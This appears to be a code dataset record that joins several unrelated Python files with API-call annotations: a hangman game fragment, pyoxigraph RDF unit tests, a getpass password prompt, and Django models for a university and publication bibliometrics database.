print('Complimenti hai vinto!')
print(d_impiccato[energia])
| [
"random.choice"
] | [((121, 148), 'random.choice', 'random.choice', (['lista_parole'], {}), '(lista_parole)\n', (134, 148), False, 'import random\n')] |
import unittest
from pyoxigraph import *
XSD_STRING = NamedNode("http://www.w3.org/2001/XMLSchema#string")
XSD_INTEGER = NamedNode("http://www.w3.org/2001/XMLSchema#integer")
RDF_LANG_STRING = NamedNode("http://www.w3.org/1999/02/22-rdf-syntax-ns#langString")
class TestNamedNode(unittest.TestCase):
def test_constructor(self):
self.assertEqual(NamedNode("http://foo").value, "http://foo")
def test_string(self):
self.assertEqual(str(NamedNode("http://foo")), "<http://foo>")
def test_equal(self):
self.assertEqual(NamedNode("http://foo"), NamedNode("http://foo"))
self.assertNotEqual(NamedNode("http://foo"), NamedNode("http://bar"))
class TestBlankNode(unittest.TestCase):
def test_constructor(self):
self.assertEqual(BlankNode("foo").value, "foo")
self.assertNotEqual(BlankNode(), BlankNode())
def test_string(self):
self.assertEqual(str(BlankNode("foo")), "_:foo")
def test_equal(self):
self.assertEqual(BlankNode("foo"), BlankNode("foo"))
self.assertNotEqual(BlankNode("foo"), BlankNode("bar"))
self.assertNotEqual(BlankNode('foo'), NamedNode('http://foo'))
self.assertNotEqual(NamedNode('http://foo'), BlankNode('foo'))
class TestLiteral(unittest.TestCase):
def test_constructor(self):
self.assertEqual(Literal("foo").value, "foo")
self.assertEqual(Literal("foo").datatype, XSD_STRING)
self.assertEqual(Literal("foo", language="en").value, "foo")
self.assertEqual(Literal("foo", language="en").language, "en")
self.assertEqual(Literal("foo", language="en").datatype, RDF_LANG_STRING)
self.assertEqual(Literal("foo", datatype=XSD_INTEGER).value, "foo")
self.assertEqual(Literal("foo", datatype=XSD_INTEGER).datatype, XSD_INTEGER)
def test_string(self):
self.assertEqual(str(Literal("foo")), '"foo"')
self.assertEqual(str(Literal("foo", language="en")), '"foo"@en')
self.assertEqual(
str(Literal("foo", datatype=XSD_INTEGER)),
'"foo"^^<http://www.w3.org/2001/XMLSchema#integer>',
)
def test_equals(self):
self.assertEqual(Literal("foo", datatype=XSD_STRING), Literal("foo"))
self.assertEqual(
Literal("foo", language="en", datatype=RDF_LANG_STRING),
Literal("foo", language="en"),
)
self.assertNotEqual(NamedNode('http://foo'), Literal('foo'))
self.assertNotEqual(Literal('foo'), NamedNode('http://foo'))
self.assertNotEqual(BlankNode('foo'), Literal('foo'))
self.assertNotEqual(Literal('foo'), BlankNode('foo'))
class TestTriple(unittest.TestCase):
def test_constructor(self):
t = Triple(
NamedNode("http://example.com/s"),
NamedNode("http://example.com/p"),
NamedNode("http://example.com/o"),
)
self.assertEqual(t.subject, NamedNode("http://example.com/s"))
self.assertEqual(t.predicate, NamedNode("http://example.com/p"))
self.assertEqual(t.object, NamedNode("http://example.com/o"))
def test_mapping(self):
t = Triple(
NamedNode("http://example.com/s"),
NamedNode("http://example.com/p"),
NamedNode("http://example.com/o"),
)
self.assertEqual(t[0], NamedNode("http://example.com/s"))
self.assertEqual(t[1], NamedNode("http://example.com/p"))
self.assertEqual(t[2], NamedNode("http://example.com/o"))
def test_destruct(self):
(s, p, o) = Triple(
NamedNode("http://example.com/s"),
NamedNode("http://example.com/p"),
NamedNode("http://example.com/o"),
)
self.assertEqual(s, NamedNode("http://example.com/s"))
self.assertEqual(p, NamedNode("http://example.com/p"))
self.assertEqual(o, NamedNode("http://example.com/o"))
def test_string(self):
self.assertEqual(
str(
Triple(
NamedNode("http://example.com/s"),
NamedNode("http://example.com/p"),
NamedNode("http://example.com/o"),
)
),
"<http://example.com/s> <http://example.com/p> <http://example.com/o> .",
)
class TestQuad(unittest.TestCase):
def test_constructor(self):
t = Quad(
NamedNode("http://example.com/s"),
NamedNode("http://example.com/p"),
NamedNode("http://example.com/o"),
NamedNode("http://example.com/g"),
)
self.assertEqual(t.subject, NamedNode("http://example.com/s"))
self.assertEqual(t.predicate, NamedNode("http://example.com/p"))
self.assertEqual(t.object, NamedNode("http://example.com/o"))
self.assertEqual(t.graph_name, NamedNode("http://example.com/g"))
self.assertEqual(
t.triple,
Triple(
NamedNode("http://example.com/s"),
NamedNode("http://example.com/p"),
NamedNode("http://example.com/o"),
),
)
self.assertEqual(
Quad(
NamedNode("http://example.com/s"),
NamedNode("http://example.com/p"),
NamedNode("http://example.com/o"),
),
Quad(
NamedNode("http://example.com/s"),
NamedNode("http://example.com/p"),
NamedNode("http://example.com/o"),
DefaultGraph(),
),
)
def test_mapping(self):
t = Quad(
NamedNode("http://example.com/s"),
NamedNode("http://example.com/p"),
NamedNode("http://example.com/o"),
NamedNode("http://example.com/g"),
)
self.assertEqual(t[0], NamedNode("http://example.com/s"))
self.assertEqual(t[1], NamedNode("http://example.com/p"))
self.assertEqual(t[2], NamedNode("http://example.com/o"))
self.assertEqual(t[3], NamedNode("http://example.com/g"))
def test_destruct(self):
(s, p, o, g) = Quad(
NamedNode("http://example.com/s"),
NamedNode("http://example.com/p"),
NamedNode("http://example.com/o"),
NamedNode("http://example.com/g"),
)
self.assertEqual(s, NamedNode("http://example.com/s"))
self.assertEqual(p, NamedNode("http://example.com/p"))
self.assertEqual(o, NamedNode("http://example.com/o"))
self.assertEqual(g, NamedNode("http://example.com/g"))
def test_string(self):
self.assertEqual(
str(
Triple(
NamedNode("http://example.com/s"),
NamedNode("http://example.com/p"),
NamedNode("http://example.com/o"),
)
),
"<http://example.com/s> <http://example.com/p> <http://example.com/o> .",
)
class TestVariable(unittest.TestCase):
def test_constructor(self):
self.assertEqual(Variable("foo").value, "foo")
def test_string(self):
self.assertEqual(str(Variable("foo")), "?foo")
def test_equal(self):
self.assertEqual(Variable("foo"), Variable("foo"))
self.assertNotEqual(Variable("foo"), Variable("bar"))
if __name__ == "__main__":
unittest.main()
| [
"unittest.main"
] | [((7347, 7362), 'unittest.main', 'unittest.main', ([], {}), '()\n', (7360, 7362), False, 'import unittest\n')] |
import getpass # importing getpass
dpass = getpass.getpass(prompt = "Enter the password: ") # by default it shows 'password'
print(f"The entered password is {dpass}") | [
"getpass.getpass"
] | [((46, 92), 'getpass.getpass', 'getpass.getpass', ([], {'prompt': '"""Enter the password: """'}), "(prompt='Enter the password: ')\n", (61, 92), False, 'import getpass\n')] |
from django.db import models
import datetime
class Region(models.Model):
name = models.CharField(max_length=200)
class University(models.Model):
address = models.CharField(max_length=255)
affilation_name = models.CharField(max_length=255)
author_count = models.IntegerField(default=0)
city = models.CharField(max_length=200)
country = models.CharField(max_length=200)
date_created = models.DateField()
document_count = models.IntegerField(default=0)
eid = models.CharField(max_length=200)
identifier = models.CharField(max_length=200)
org_domain = models.CharField(max_length=200)
org_type = models.CharField(max_length=200)
org_url = models.CharField(max_length=200)
postal_code = models.CharField(max_length=200)
scopus_affiliation_link = models.CharField(max_length=200)
search_link = models.CharField(max_length=200)
self_link = models.CharField(max_length=200)
state = models.ForeignKey(Region, on_delete=models.CASCADE)
url = models.CharField(max_length=200)
lat = models.FloatField(default=0.0)
lon = models.FloatField(default=0.0)
class Author(models.Model):
affilation_current = models.ForeignKey(University, on_delete=models.CASCADE)
citation_count = models.IntegerField(default=0)
cited_by_count = models.IntegerField(default=0)
coauthor_count = models.IntegerField(default=0)
coauthor_link = models.CharField(max_length=255)
date_created = models.DateField()
document_count = models.IntegerField(default=0)
eid = models.CharField(max_length=200)
given_name = models.CharField(max_length=200)
h_index = models.CharField(max_length=100)
identifier = models.CharField(max_length=100)
indexed_name = models.CharField(max_length=100)
initials = models.CharField(max_length=100)
orc_id = models.CharField(max_length=100)
publication_range = models.CharField(max_length=100)
scopus_author_link = models.CharField(max_length=255)
search_link = models.CharField(max_length=255)
self_link = models.CharField(max_length=255)
status = models.CharField(max_length=100)
surname = models.CharField(max_length=100)
url = models.CharField(max_length=255)
school_name = models.CharField(max_length=255, default='')
russian_fullname = models.CharField(max_length=255, default='')
job_category = models.CharField(max_length=255, default='')
job_position = models.CharField(max_length=255, default='')
job_unit = models.CharField(max_length=255, default='')
job_parent_unit = models.CharField(max_length=255, default='')
job_rate = models.CharField(max_length=255, default='0.0')
type_employment = models.CharField(max_length=255, default='')
date_birth = models.DateField(default=datetime.date(1900, 1, 1))
last_degree = models.CharField(max_length=255, default='')
phd = models.BooleanField(default=False)
last_academic_title = models.CharField(max_length=255, default='')
relevant = models.BooleanField(default=False)
class Journal(models.Model):
sourcetitle = models.CharField(max_length=255)
abbreviation = models.CharField(max_length=200)
type_journal = models.CharField(max_length=100)
issn = models.CharField(max_length=100)
source_id = models.IntegerField(null=True)
cnt_publications = models.IntegerField(default=0)
class Document(models.Model):
class Meta:
db_table = 'api_document'
eid = models.CharField(max_length=200)
doi = models.CharField(max_length=200)
pii = models.CharField(max_length=200, default="-1")
pubmed_id = models.CharField(max_length=200)
title = models.CharField(max_length=255)
subtype = models.CharField(max_length=200)
# subtype_description = models.CharField(max_length=200)
creator = models.ForeignKey(Author, on_delete=models.CASCADE)
author_count = models.IntegerField(default=0)
cover_date = models.DateField()
cover_display_date = models.CharField(max_length=200)
publication_name = models.CharField(max_length=255)
issn = models.ForeignKey(Journal, on_delete=models.CASCADE)
source_id = models.CharField(max_length=200)
eIssn = models.CharField(max_length=200)
aggregation_type = models.CharField(max_length=200)
volume = models.CharField(max_length=100, default="0")
issue_identifier = models.CharField(max_length=200)
article_number = models.CharField(max_length=200)
page_range = models.CharField(max_length=200, default="-1")
description = models.TextField()
authkeywords = models.TextField()
citedby_count = models.IntegerField(default=0)
openaccess = models.IntegerField(default=0)
fund_acr = models.CharField(max_length=200)
fund_no = models.CharField(max_length=200)
fund_sponsor = models.CharField(max_length=200)
citation_by_year = models.TextField(default="")
citation_by_year_with_self = models.TextField(default="")
class Subject(models.Model):
name = models.CharField(max_length=200)
full_name = models.CharField(max_length=255)
class DocumentSubject(models.Model):
id_doc = models.ForeignKey(Document, on_delete=models.CASCADE, default=0)
id_sub = models.ForeignKey(Subject, on_delete=models.CASCADE, default=0)
class AuthorJournal(models.Model):
id_auth = models.ForeignKey(Author, on_delete=models.CASCADE, default=0)
id_journal = models.ForeignKey(Journal, on_delete=models.CASCADE, default=0)
class AuthorUniversity(models.Model):
id_auth = models.ForeignKey(Author, on_delete=models.CASCADE, default=0)
id_university = models.ForeignKey(University, on_delete=models.CASCADE, default=0)
class DocumentAuthorUniversity(models.Model):
id_doc = models.ForeignKey(Document, on_delete=models.CASCADE, default=0, null=True)
id_auth = models.ForeignKey(Author, on_delete=models.CASCADE, default=0, null=True)
id_university = models.ForeignKey(University, on_delete=models.CASCADE, default=0, null=True)
class AuthorSubject(models.Model):
id_author = models.ForeignKey(Author, on_delete=models.CASCADE)
id_sub = models.ForeignKey(Subject, on_delete=models.CASCADE)
class DocumentUniversityAffiliations(models.Model):
id_doc = models.ForeignKey(Document, on_delete=models.CASCADE, default=0, null=True)
id_university = models.ForeignKey(University, on_delete=models.CASCADE, default=0, null=True)
class Rankings(models.Model):
name = models.CharField(max_length=255)
class UniversityRankPlace(models.Model):
id_university = models.ForeignKey(University, on_delete=models.CASCADE, default=0)
id_ranking = models.ForeignKey(Rankings, on_delete=models.CASCADE, default=0)
year = models.IntegerField(default=0)
place = models.CharField(max_length=255, default="")
class UniversityRankCriteria(models.Model):
id_university = models.ForeignKey(University, on_delete=models.CASCADE, default=0)
id_ranking = models.ForeignKey(Rankings, on_delete=models.CASCADE, default=0)
criteria = models.CharField(max_length=255, default="")
score = models.FloatField(default=0.0)
class DateCitationCount(models.Model):
date = models.DateField(auto_now=True)
citation_count = models.IntegerField(default=0)
self_citation_count = models.IntegerField(default=0)
| [
"django.db.models.TextField",
"django.db.models.CharField",
"django.db.models.ForeignKey",
"datetime.date",
"django.db.models.FloatField",
"django.db.models.BooleanField",
"django.db.models.IntegerField",
"django.db.models.DateField"
] | [((86, 118), 'django.db.models.CharField', 'models.CharField', ([], {'max_length': '(200)'}), '(max_length=200)\n', (102, 118), False, 'from django.db import models\n'), ((167, 199), 'django.db.models.CharField', 'models.CharField', ([], {'max_length': '(255)'}), '(max_length=255)\n', (183, 199), False, 'from django.db import models\n'), ((222, 254), 'django.db.models.CharField', 'models.CharField', ([], {'max_length': '(255)'}), '(max_length=255)\n', (238, 254), False, 'from django.db import models\n'), ((274, 304), 'django.db.models.IntegerField', 'models.IntegerField', ([], {'default': '(0)'}), '(default=0)\n', (293, 304), False, 'from django.db import models\n'), ((316, 348), 'django.db.models.CharField', 'models.CharField', ([], {'max_length': '(200)'}), '(max_length=200)\n', (332, 348), False, 'from django.db import models\n'), ((363, 395), 'django.db.models.CharField', 'models.CharField', ([], {'max_length': '(200)'}), '(max_length=200)\n', (379, 395), False, 'from django.db import models\n'), ((415, 433), 'django.db.models.DateField', 'models.DateField', ([], {}), '()\n', (431, 433), False, 'from django.db import models\n'), ((455, 485), 'django.db.models.IntegerField', 'models.IntegerField', ([], {'default': '(0)'}), '(default=0)\n', (474, 485), False, 'from django.db import models\n'), ((496, 528), 'django.db.models.CharField', 'models.CharField', ([], {'max_length': '(200)'}), '(max_length=200)\n', (512, 528), False, 'from django.db import models\n'), ((546, 578), 'django.db.models.CharField', 'models.CharField', ([], {'max_length': '(200)'}), '(max_length=200)\n', (562, 578), False, 'from django.db import models\n'), ((596, 628), 'django.db.models.CharField', 'models.CharField', ([], {'max_length': '(200)'}), '(max_length=200)\n', (612, 628), False, 'from django.db import models\n'), ((644, 676), 'django.db.models.CharField', 'models.CharField', ([], {'max_length': '(200)'}), '(max_length=200)\n', (660, 676), False, 'from django.db import models\n'), ((691, 723), 'django.db.models.CharField', 'models.CharField', ([], {'max_length': '(200)'}), '(max_length=200)\n', (707, 723), False, 'from django.db import models\n'), ((742, 774), 'django.db.models.CharField', 'models.CharField', ([], {'max_length': '(200)'}), '(max_length=200)\n', (758, 774), False, 'from django.db import models\n'), ((805, 837), 'django.db.models.CharField', 'models.CharField', ([], {'max_length': '(200)'}), '(max_length=200)\n', (821, 837), False, 'from django.db import models\n'), ((856, 888), 'django.db.models.CharField', 'models.CharField', ([], {'max_length': '(200)'}), '(max_length=200)\n', (872, 888), False, 'from django.db import models\n'), ((905, 937), 'django.db.models.CharField', 'models.CharField', ([], {'max_length': '(200)'}), '(max_length=200)\n', (921, 937), False, 'from django.db import models\n'), ((950, 1001), 'django.db.models.ForeignKey', 'models.ForeignKey', (['Region'], {'on_delete': 'models.CASCADE'}), '(Region, on_delete=models.CASCADE)\n', (967, 1001), False, 'from django.db import models\n'), ((1012, 1044), 'django.db.models.CharField', 'models.CharField', ([], {'max_length': '(200)'}), '(max_length=200)\n', (1028, 1044), False, 'from django.db import models\n'), ((1055, 1085), 'django.db.models.FloatField', 'models.FloatField', ([], {'default': '(0.0)'}), '(default=0.0)\n', (1072, 1085), False, 'from django.db import models\n'), ((1096, 1126), 'django.db.models.FloatField', 'models.FloatField', ([], {'default': '(0.0)'}), '(default=0.0)\n', (1113, 1126), False, 'from django.db import models\n'), ((1182, 1237), 'django.db.models.ForeignKey', 'models.ForeignKey', (['University'], {'on_delete': 'models.CASCADE'}), '(University, on_delete=models.CASCADE)\n', (1199, 1237), False, 'from django.db import models\n'), ((1259, 1289), 'django.db.models.IntegerField', 'models.IntegerField', ([], {'default': '(0)'}), '(default=0)\n', (1278, 1289), False, 'from django.db import models\n'), ((1311, 1341), 'django.db.models.IntegerField', 'models.IntegerField', ([], {'default': '(0)'}), '(default=0)\n', (1330, 1341), False, 'from django.db import models\n'), ((1363, 1393), 'django.db.models.IntegerField', 'models.IntegerField', ([], {'default': '(0)'}), '(default=0)\n', (1382, 1393), False, 'from django.db import models\n'), ((1414, 1446), 'django.db.models.CharField', 'models.CharField', ([], {'max_length': '(255)'}), '(max_length=255)\n', (1430, 1446), False, 'from django.db import models\n'), ((1466, 1484), 'django.db.models.DateField', 'models.DateField', ([], {}), '()\n', (1482, 1484), False, 'from django.db import models\n'), ((1506, 1536), 'django.db.models.IntegerField', 'models.IntegerField', ([], {'default': '(0)'}), '(default=0)\n', (1525, 1536), False, 'from django.db import models\n'), ((1547, 1579), 'django.db.models.CharField', 'models.CharField', ([], {'max_length': '(200)'}), '(max_length=200)\n', (1563, 1579), False, 'from django.db import models\n'), ((1597, 1629), 'django.db.models.CharField', 'models.CharField', ([], {'max_length': '(200)'}), '(max_length=200)\n', (1613, 1629), False, 'from django.db import models\n'), ((1644, 1676), 'django.db.models.CharField', 'models.CharField', ([], {'max_length': '(100)'}), '(max_length=100)\n', (1660, 1676), False, 'from django.db import models\n'), ((1694, 1726), 'django.db.models.CharField', 'models.CharField', ([], {'max_length': '(100)'}), '(max_length=100)\n', (1710, 1726), False, 'from django.db import models\n'), ((1746, 1778), 'django.db.models.CharField', 'models.CharField', ([], {'max_length': '(100)'}), '(max_length=100)\n', (1762, 1778), False, 'from django.db import models\n'), ((1794, 1826), 'django.db.models.CharField', 'models.CharField', ([], {'max_length': '(100)'}), '(max_length=100)\n', (1810, 1826), False, 'from django.db import models\n'), ((1840, 1872), 'django.db.models.CharField', 'models.CharField', ([], {'max_length': '(100)'}), '(max_length=100)\n', (1856, 1872), False, 'from django.db import models\n'), ((1897, 1929), 'django.db.models.CharField', 'models.CharField', ([], {'max_length': '(100)'}), '(max_length=100)\n', (1913, 1929), False, 'from django.db import models\n'), ((1955, 1987), 'django.db.models.CharField', 'models.CharField', ([], {'max_length': '(255)'}), '(max_length=255)\n', (1971, 1987), False, 'from django.db import models\n'), ((2006, 2038), 'django.db.models.CharField', 'models.CharField', ([], {'max_length': '(255)'}), '(max_length=255)\n', (2022, 2038), False, 'from django.db import models\n'), ((2055, 2087), 'django.db.models.CharField', 'models.CharField', ([], {'max_length': '(255)'}), '(max_length=255)\n', (2071, 2087), False, 'from django.db import models\n'), ((2101, 2133), 'django.db.models.CharField', 'models.CharField', ([], {'max_length': '(100)'}), '(max_length=100)\n', (2117, 2133), False, 'from django.db import models\n'), ((2148, 2180), 'django.db.models.CharField', 'models.CharField', ([], {'max_length': '(100)'}), '(max_length=100)\n', (2164, 2180), False, 'from django.db import models\n'), ((2191, 2223), 'django.db.models.CharField', 'models.CharField', ([], {'max_length': '(255)'}), '(max_length=255)\n', (2207, 2223), False, 'from django.db import models\n'), ((2242, 2286), 'django.db.models.CharField', 'models.CharField', ([], {'max_length': '(255)', 'default': '""""""'}), "(max_length=255, default='')\n", (2258, 2286), False, 'from django.db import models\n'), ((2310, 2354), 'django.db.models.CharField', 'models.CharField', ([], {'max_length': '(255)', 'default': '""""""'}), "(max_length=255, default='')\n", (2326, 2354), False, 'from django.db import models\n'), ((2374, 2418), 'django.db.models.CharField', 'models.CharField', ([], {'max_length': '(255)', 'default': '""""""'}), "(max_length=255, default='')\n", (2390, 2418), False, 'from django.db import models\n'), ((2438, 2482), 'django.db.models.CharField', 'models.CharField', ([], {'max_length': '(255)', 'default': '""""""'}), "(max_length=255, default='')\n", (2454, 2482), False, 'from django.db import models\n'), ((2498, 2542), 'django.db.models.CharField', 'models.CharField', ([], {'max_length': '(255)', 'default': '""""""'}), "(max_length=255, default='')\n", (2514, 2542), False, 'from django.db import models\n'), ((2565, 2609), 'django.db.models.CharField', 'models.CharField', ([], {'max_length': '(255)', 'default': '""""""'}), "(max_length=255, default='')\n", (2581, 2609), False, 'from django.db import models\n'), ((2625, 2672), 'django.db.models.CharField', 'models.CharField', ([], {'max_length': '(255)', 'default': '"""0.0"""'}), "(max_length=255, default='0.0')\n", (2641, 2672), False, 'from django.db import models\n'), ((2695, 2739), 'django.db.models.CharField', 'models.CharField', ([], {'max_length': '(255)', 'default': '""""""'}), "(max_length=255, default='')\n", (2711, 2739), False, 'from django.db import models\n'), ((2827, 2871), 'django.db.models.CharField', 'models.CharField', ([], {'max_length': '(255)', 'default': '""""""'}), "(max_length=255, default='')\n", (2843, 2871), False, 'from django.db import models\n'), ((2882, 2916), 'django.db.models.BooleanField', 'models.BooleanField', ([], {'default': '(False)'}), '(default=False)\n', (2901, 2916), False, 'from django.db import models\n'), ((2943, 2987), 'django.db.models.CharField', 'models.CharField', ([], {'max_length': '(255)', 'default': '""""""'}), "(max_length=255, default='')\n", (2959, 2987), False, 'from django.db import models\n'), ((3003, 3037), 'django.db.models.BooleanField', 'models.BooleanField', ([], {'default': '(False)'}), '(default=False)\n', (3022, 3037), False, 'from django.db import models\n'), ((3087, 3119), 'django.db.models.CharField', 'models.CharField', ([], {'max_length': '(255)'}), '(max_length=255)\n', (3103, 3119), False, 'from django.db import models\n'), ((3139, 3171), 'django.db.models.CharField', 'models.CharField', ([], {'max_length': '(200)'}), '(max_length=200)\n', (3155, 3171), False, 'from django.db import models\n'), ((3191, 3223), 'django.db.models.CharField', 'models.CharField', ([], {'max_length': '(100)'}), '(max_length=100)\n', (3207, 3223), False, 'from django.db import models\n'), ((3235, 3267), 'django.db.models.CharField', 'models.CharField', ([], {'max_length': '(100)'}), '(max_length=100)\n', (3251, 3267), False, 'from django.db import models\n'), ((3284, 3314), 'django.db.models.IntegerField', 'models.IntegerField', ([], {'null': '(True)'}), '(null=True)\n', (3303, 3314), False, 'from django.db import models\n'), ((3338, 3368), 'django.db.models.IntegerField', 'models.IntegerField', ([], {'default': '(0)'}), '(default=0)\n', (3357, 3368), False, 'from django.db import models\n'), ((3466, 3498), 'django.db.models.CharField', 'models.CharField', ([], {'max_length': '(200)'}), '(max_length=200)\n', (3482, 3498), False, 'from django.db import models\n'), ((3509, 3541), 'django.db.models.CharField', 'models.CharField', ([], {'max_length': '(200)'}), '(max_length=200)\n', (3525, 3541), False, 'from django.db import models\n'), ((3552, 3598), 'django.db.models.CharField', 'models.CharField', ([], {'max_length': '(200)', 'default': '"""-1"""'}), "(max_length=200, default='-1')\n", (3568, 3598), False, 'from django.db import models\n'), ((3615, 3647), 'django.db.models.CharField', 'models.CharField', ([], {'max_length': '(200)'}), '(max_length=200)\n', (3631, 3647), False, 'from django.db import models\n'), ((3660, 3692), 'django.db.models.CharField', 'models.CharField', ([], {'max_length': '(255)'}), '(max_length=255)\n', (3676, 3692), False, 'from django.db import models\n'), ((3707, 3739), 'django.db.models.CharField', 'models.CharField', ([], {'max_length': '(200)'}), '(max_length=200)\n', (3723, 3739), False, 'from django.db import models\n'), ((3815, 3866), 'django.db.models.ForeignKey', 'models.ForeignKey', (['Author'], {'on_delete': 'models.CASCADE'}), '(Author, on_delete=models.CASCADE)\n', (3832, 3866), False, 'from django.db import models\n'), ((3886, 3916), 'django.db.models.IntegerField', 'models.IntegerField', ([], {'default': '(0)'}), '(default=0)\n', (3905, 3916), False, 'from django.db import models\n'), ((3934, 3952), 'django.db.models.DateField', 'models.DateField', ([], {}), '()\n', (3950, 3952), False, 'from django.db import models\n'), ((3978, 4010), 'django.db.models.CharField', 'models.CharField', ([], {'max_length': '(200)'}), '(max_length=200)\n', (3994, 4010), False, 'from django.db import models\n'), ((4034, 4066), 'django.db.models.CharField', 'models.CharField', ([], {'max_length': '(255)'}), '(max_length=255)\n', (4050, 4066), False, 'from django.db import models\n'), ((4078, 4130), 'django.db.models.ForeignKey', 'models.ForeignKey', (['Journal'], {'on_delete': 'models.CASCADE'}), '(Journal, on_delete=models.CASCADE)\n', (4095, 4130), False, 'from django.db import models\n'), ((4147, 4179), 'django.db.models.CharField', 'models.CharField', ([], {'max_length': '(200)'}), '(max_length=200)\n', (4163, 4179), False, 'from django.db import models\n'), ((4192, 4224), 'django.db.models.CharField', 'models.CharField', ([], {'max_length': '(200)'}), '(max_length=200)\n', (4208, 4224), False, 'from django.db import models\n'), ((4248, 4280), 'django.db.models.CharField', 'models.CharField', ([], {'max_length': '(200)'}), '(max_length=200)\n', (4264, 4280), False, 'from django.db import models\n'), ((4294, 4339), 'django.db.models.CharField', 'models.CharField', ([], {'max_length': '(100)', 'default': '"""0"""'}), "(max_length=100, default='0')\n", (4310, 4339), False, 'from django.db import models\n'), ((4363, 4395), 'django.db.models.CharField', 'models.CharField', ([], {'max_length': '(200)'}), '(max_length=200)\n', (4379, 4395), False, 'from django.db import models\n'), ((4417, 4449), 'django.db.models.CharField', 'models.CharField', ([], {'max_length': '(200)'}), '(max_length=200)\n', (4433, 4449), False, 'from django.db import models\n'), ((4467, 4513), 'django.db.models.CharField', 'models.CharField', ([], {'max_length': '(200)', 'default': '"""-1"""'}), "(max_length=200, default='-1')\n", (4483, 4513), False, 'from django.db import models\n'), ((4532, 4550), 'django.db.models.TextField', 'models.TextField', ([], {}), '()\n', (4548, 4550), False, 'from django.db import models\n'), ((4570, 4588), 'django.db.models.TextField', 'models.TextField', ([], {}), '()\n', (4586, 4588), False, 'from django.db import models\n'), ((4609, 4639), 'django.db.models.IntegerField', 'models.IntegerField', ([], {'default': '(0)'}), '(default=0)\n', (4628, 4639), False, 'from django.db import models\n'), ((4657, 4687), 'django.db.models.IntegerField', 'models.IntegerField', ([], {'default': '(0)'}), '(default=0)\n', (4676, 4687), False, 'from django.db import models\n'), ((4703, 4735), 'django.db.models.CharField', 'models.CharField', ([], {'max_length': '(200)'}), '(max_length=200)\n', (4719, 4735), False, 'from django.db import models\n'), ((4750, 4782), 'django.db.models.CharField', 'models.CharField', ([], {'max_length': '(200)'}), '(max_length=200)\n', (4766, 4782), False, 'from django.db import models\n'), ((4802, 4834), 'django.db.models.CharField', 'models.CharField', ([], {'max_length': '(200)'}), '(max_length=200)\n', (4818, 4834), False, 'from django.db import models\n'), ((4858, 4886), 'django.db.models.TextField', 'models.TextField', ([], {'default': '""""""'}), "(default='')\n", (4874, 4886), False, 'from django.db import models\n'), ((4920, 4948), 'django.db.models.TextField', 'models.TextField', ([], {'default': '""""""'}), "(default='')\n", (4936, 4948), False, 'from django.db import models\n'), ((4991, 5023), 'django.db.models.CharField', 'models.CharField', ([], {'max_length': '(200)'}), '(max_length=200)\n', (5007, 5023), False, 'from django.db import models\n'), ((5040, 5072), 'django.db.models.CharField', 'models.CharField', ([], {'max_length': '(255)'}), '(max_length=255)\n', (5056, 5072), False, 'from django.db import models\n'), ((5125, 5189), 'django.db.models.ForeignKey', 'models.ForeignKey', (['Document'], {'on_delete': 'models.CASCADE', 'default': '(0)'}), '(Document, on_delete=models.CASCADE, default=0)\n', (5142, 5189), False, 'from django.db import models\n'), ((5203, 5266), 'django.db.models.ForeignKey', 'models.ForeignKey', (['Subject'], {'on_delete': 'models.CASCADE', 'default': '(0)'}), '(Subject, on_delete=models.CASCADE, default=0)\n', (5220, 5266), False, 'from django.db import models\n'), ((5318, 5380), 'django.db.models.ForeignKey', 'models.ForeignKey', (['Author'], {'on_delete': 'models.CASCADE', 'default': '(0)'}), '(Author, on_delete=models.CASCADE, default=0)\n', (5335, 5380), False, 'from django.db import models\n'), ((5398, 5461), 'django.db.models.ForeignKey', 'models.ForeignKey', (['Journal'], {'on_delete': 'models.CASCADE', 'default': '(0)'}), '(Journal, on_delete=models.CASCADE, default=0)\n', (5415, 5461), False, 'from django.db import models\n'), ((5516, 5578), 'django.db.models.ForeignKey', 'models.ForeignKey', (['Author'], {'on_delete': 'models.CASCADE', 'default': '(0)'}), '(Author, on_delete=models.CASCADE, default=0)\n', (5533, 5578), False, 'from django.db import models\n'), ((5599, 5665), 'django.db.models.ForeignKey', 'models.ForeignKey', (['University'], {'on_delete': 'models.CASCADE', 'default': '(0)'}), '(University, on_delete=models.CASCADE, default=0)\n', (5616, 5665), False, 'from django.db import models\n'), ((5727, 5802), 'django.db.models.ForeignKey', 'models.ForeignKey', (['Document'], {'on_delete': 'models.CASCADE', 'default': '(0)', 'null': '(True)'}), '(Document, on_delete=models.CASCADE, default=0, null=True)\n', (5744, 5802), False, 'from django.db import models\n'), ((5817, 5890), 'django.db.models.ForeignKey', 'models.ForeignKey', (['Author'], {'on_delete': 'models.CASCADE', 'default': '(0)', 'null': '(True)'}), '(Author, on_delete=models.CASCADE, default=0, null=True)\n', (5834, 5890), False, 'from django.db import models\n'), ((5911, 5988), 'django.db.models.ForeignKey', 'models.ForeignKey', (['University'], {'on_delete': 'models.CASCADE', 'default': '(0)', 'null': '(True)'}), '(University, on_delete=models.CASCADE, default=0, null=True)\n', (5928, 5988), False, 'from django.db import models\n'), ((6042, 6093), 'django.db.models.ForeignKey', 'models.ForeignKey', (['Author'], {'on_delete': 'models.CASCADE'}), '(Author, on_delete=models.CASCADE)\n', (6059, 6093), False, 'from django.db import models\n'), ((6107, 6159), 'django.db.models.ForeignKey', 'models.ForeignKey', (['Subject'], {'on_delete': 'models.CASCADE'}), '(Subject, on_delete=models.CASCADE)\n', (6124, 6159), False, 'from django.db import models\n'), ((6227, 6302), 'django.db.models.ForeignKey', 'models.ForeignKey', (['Document'], {'on_delete': 'models.CASCADE', 'default': '(0)', 'null': '(True)'}), '(Document, on_delete=models.CASCADE, default=0, null=True)\n', (6244, 6302), False, 'from django.db import models\n'), ((6323, 6400), 'django.db.models.ForeignKey', 'models.ForeignKey', (['University'], {'on_delete': 'models.CASCADE', 'default': '(0)', 'null': '(True)'}), '(University, on_delete=models.CASCADE, default=0, null=True)\n', (6340, 6400), False, 'from django.db import models\n'), ((6444, 6476), 'django.db.models.CharField', 'models.CharField', ([], {'max_length': '(255)'}), '(max_length=255)\n', (6460, 6476), False, 'from django.db import models\n'), ((6540, 6606), 'django.db.models.ForeignKey', 'models.ForeignKey', (['University'], {'on_delete': 'models.CASCADE', 'default': '(0)'}), '(University, on_delete=models.CASCADE, default=0)\n', (6557, 6606), False, 'from django.db import models\n'), ((6624, 6688), 'django.db.models.ForeignKey', 'models.ForeignKey', (['Rankings'], {'on_delete': 'models.CASCADE', 'default': '(0)'}), '(Rankings, on_delete=models.CASCADE, default=0)\n', (6641, 6688), False, 'from django.db import models\n'), ((6700, 6730), 'django.db.models.IntegerField', 'models.IntegerField', ([], {'default': 